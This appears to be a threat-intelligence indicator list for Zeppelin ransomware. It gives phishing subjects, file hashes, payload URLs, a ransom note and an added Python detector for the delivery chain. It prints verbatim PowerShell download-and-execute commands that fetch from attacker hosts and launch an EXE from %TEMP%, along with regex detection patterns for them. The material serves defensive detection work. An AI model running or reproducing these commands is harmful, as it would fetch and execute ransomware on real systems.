forked from executemalware/Malware-IOCs
2021-09-01 Zeppelin Ransomware IOCs
THREAT IDENTIFICATION: ZEPPELIN RANSOMWARE
SUBJECTS OBSERVED
Bill W-97746 for online order 271645 is covered.
Bill XE-59269 for online order 951666 is covered.
docs
documents
files
information
papers
paperwork
SENDERS OBSERVED
ZIP FILE HASHES
012299610c7595d1bdae6c321acf4cb2
17605f87137649b140e0420ad66ebc76
1953dce993e3ab975f7e7d8b93aca772
36f0ecfca4ca6a1d69fd761272ee231a
404679a5f2b6213449d23bcd15da6061
6418bec5672343bda06a6039d7e04e17
7ea2ff1b7167e3c04e722bd78cd58355
a78bb02f6715e4600d1c0e204ed3d85a
d569e4d8c8733b4e0516315692d5875c
f2073bcf863346b43f3c1ed6393f8f35
JAVASCRIPT FILE HASHES
0e544f7d6723a83df8095cfd978b240f
1f185f20f21f2d2bc7e78d830e31e685
4a523584342127326fbb242723eb59f7
4c941a179f8fabbd4204cb5ca7d47b60
59c2900e607f7c332c58f308aee48f25
698cbec287409f76bb12127b8d8d4c81
96bd000b72c1622017d5218ff0401587
a1ea178159b7663900f88ce48aa4e75d
bd8cab14c86e7cd0cd4a3b2d6bcc2e1a
dc744c768d84c10f82bbbb481c4a178c
ADDITIONAL FILE HASHES
Payment.zip
4849be6b923692f3b50e37e7ec2651f4
ADDITIONAL PAYLOAD FILE HASHES
bin.exe
d6eb8fdfcf2c636bca2c8e6d88829aeb
CAPTURED/DECODED COMMAND FROM RUNNING THE JS FILE
IEX (New-Object Net.Webclient).downloadstring("https://jolantagraban.pl/log/57843441668980/dll/assistant.php")
COMMAND RETURNED FROM VISITING THE PHP URL (ABOVE)
$path = $Env:temp+'\aPwUd.exe'; $client = New-Object System.Net.WebClient; $client.downloadfile('https://kenire.co.ke/cli/985853400833/pattern.exe',$path); Start-Process -FilePath $path
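The two commands above are the whole delivery chain: the JS launches a PowerShell download cradle (IEX over the string fetched from the .php URL), and the string it fetches is itself PowerShell that writes an EXE into %TEMP% and starts it. The following Python is an added example, not part of the original IOC list or its author's material: it turns that chain into detection logic over decoded PowerShell script-block text (the ScriptBlockText field of Event ID 4104, assumed already captured and deobfuscated). The sample lines are constructed; two reproduce the captured commands verbatim and two are benign administrative activity that must not fire.

```python
"""Flag the Zeppelin two-stage PowerShell download chain in script-block logs.

Added example; the log lines below are constructed to mirror the captured
commands and are not from the original IOC list's telemetry.
"""
import re
from urllib.parse import urlsplit

# Stage 1: IEX executing whatever a remote URL returns (download cradle).
CRADLE_RE = re.compile(
    r"\bIEX\b.*?New-Object\s+(?:System\.)?Net\.WebClient\)"
    r".*?\.downloadstring\(\s*['\"](?P<url>https?://[^'\"]+)['\"]",
    re.IGNORECASE,
)
# Stage 2: DownloadFile into a variable path, then Start-Process of that
# same variable. Requiring the same variable in both places is what keeps
# ordinary installer downloads from matching.
DROPPER_RE = re.compile(
    r"\.downloadfile\(\s*['\"](?P<url>https?://[^'\"]+)['\"]\s*,\s*"
    r"(?P<var>\$\w+)\s*\).*?Start-Process\s+-FilePath\s+(?P=var)\b",
    re.IGNORECASE | re.DOTALL,
)
# Resolves "$path = $Env:temp+'\name.exe'" so the drop location can be reported.
TEMP_PATH_RE = re.compile(
    r"(?P<var>\$\w+)\s*=\s*\$Env:temp\s*\+\s*['\"](?P<name>\\[^'\"]+)['\"]",
    re.IGNORECASE,
)

# Constructed sample ScriptBlockText values.
SAMPLE_SCRIPTBLOCKS = [
    # the decoded stage-1 command captured from the JS file
    'IEX (New-Object Net.Webclient).downloadstring("https://jolantagraban.pl/log/57843441668980/dll/assistant.php")',
    # the stage-2 command returned by the PHP URL
    "$path = $Env:temp+'\\aPwUd.exe'; $client = New-Object System.Net.WebClient; "
    "$client.downloadfile('https://kenire.co.ke/cli/985853400833/pattern.exe',$path); "
    "Start-Process -FilePath $path",
    # benign: file-system housekeeping, no network or execution
    "Get-ChildItem -Path C:\\Users -Recurse | Where-Object {$_.Length -gt 1GB}",
    # benign: a download to a fixed path with no follow-on execution
    "$client = New-Object System.Net.WebClient; "
    "$client.DownloadFile('https://example.invalid/tool.msi', 'C:\\Installers\\tool.msi')",
]


def analyze_scriptblock(text):
    """Return a list of findings for one script block (empty if clean)."""
    findings = []
    m = CRADLE_RE.search(text)
    if m:
        findings.append({"stage": "cradle", "url": m.group("url"), "drop_path": None})
    m = DROPPER_RE.search(text)
    if m:
        var = m.group("var").lower()
        drop = None
        for t in TEMP_PATH_RE.finditer(text):
            if t.group("var").lower() == var:
                drop = "%TEMP%" + t.group("name")
        findings.append({"stage": "dropper", "url": m.group("url"), "drop_path": drop})
    return findings


def scan(lines):
    """Run analyze_scriptblock over every line, tagging hits with a 1-based line number."""
    hits = []
    for lineno, line in enumerate(lines, 1):
        for finding in analyze_scriptblock(line):
            hits.append({"line": lineno, **finding})
    return hits


def defang(url):
    """Render a URL safe to paste into a report: hxxps://host[.]tld/path."""
    parts = urlsplit(url)
    scheme = parts.scheme.replace("http", "hxxp")
    host = parts.netloc.replace(".", "[.]")
    query = f"?{parts.query}" if parts.query else ""
    return f"{scheme}://{host}{parts.path}{query}"


if __name__ == "__main__":
    for hit in scan(SAMPLE_SCRIPTBLOCKS):
        print(hit["line"], hit["stage"], defang(hit["url"]), hit["drop_path"])
```

The URLs are the brittle part of this; the hosts above were already attacker-controlled infrastructure at the time of capture and will rotate. The durable signals are the cradle shape (IEX over DownloadString) and, more specifically, DownloadFile into a variable under $Env:temp followed by Start-Process on that same variable, which is why the second pattern insists on the variable matching rather than on any particular filename.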
INTERMEDIATE DOWNLOAD URLS
https://jolantagraban.pl/log/57843441668980/dll/assistant.php
ZEPPELIN PAYLOAD URLS
https://kenire.co.ke/cli/985853400833/pattern.exe
ZEPPELIN PAYLOAD FILE HASHES
pattern.exe
dcef208fcdac3345c6899a478d16980f
ADDITIONAL OBSERVED NETWORK TRAFFIC
http://geoiptool.com/
www.geodatatool.com
http://iplogger.org/1L3ig7.gz
RANSOM NOTE CONTENTS
!!! ALL YOUR FILES ARE ENCRYPTED !!!
All your files, documents, photos, databases and other important files are encrypted.
You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key.
Only we can give you this key and only we can recover your files.
To be sure we have the decryptor and it works you can send an email: [email protected] and decrypt one file for free.
But this file should be of not valuable!
Do you really want to restore your files?
Write to email: [email protected]
Reserved email: [email protected]
Reserved email: [email protected]
Your personal ID: AXX-4XX-1XX
Attention!
* Do not rename encrypted files.
* Do not try to decrypt your data using third party software, it may cause permanent data loss.
* Decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.
SUPPORTING EVIDENCE
https://urlhaus.abuse.ch/browse.php?search=dcef208fcdac3345c6899a478d16980f
https://app.any.run/tasks/5e74bc25-136c-49bb-85b3-86cc1f482edb/
https://www.virustotal.com/gui/file/824a76c39895bc3ad4f5dfc27fc3ac80d26514118c4669505a1f0cfdc8fdbcdc/detection
https://www.cyber.nj.gov/threat-center/threat-profiles/ransomware-variants/buran
XLoader/Formbook References:
https://www.virustotal.com/gui/file/dc26789a27709300dcdd742b50b8acb5c4d96d13c0aa5adb69c4f76d8e75c8ba/detection
https://tria.ge/210822-ymazkdezzn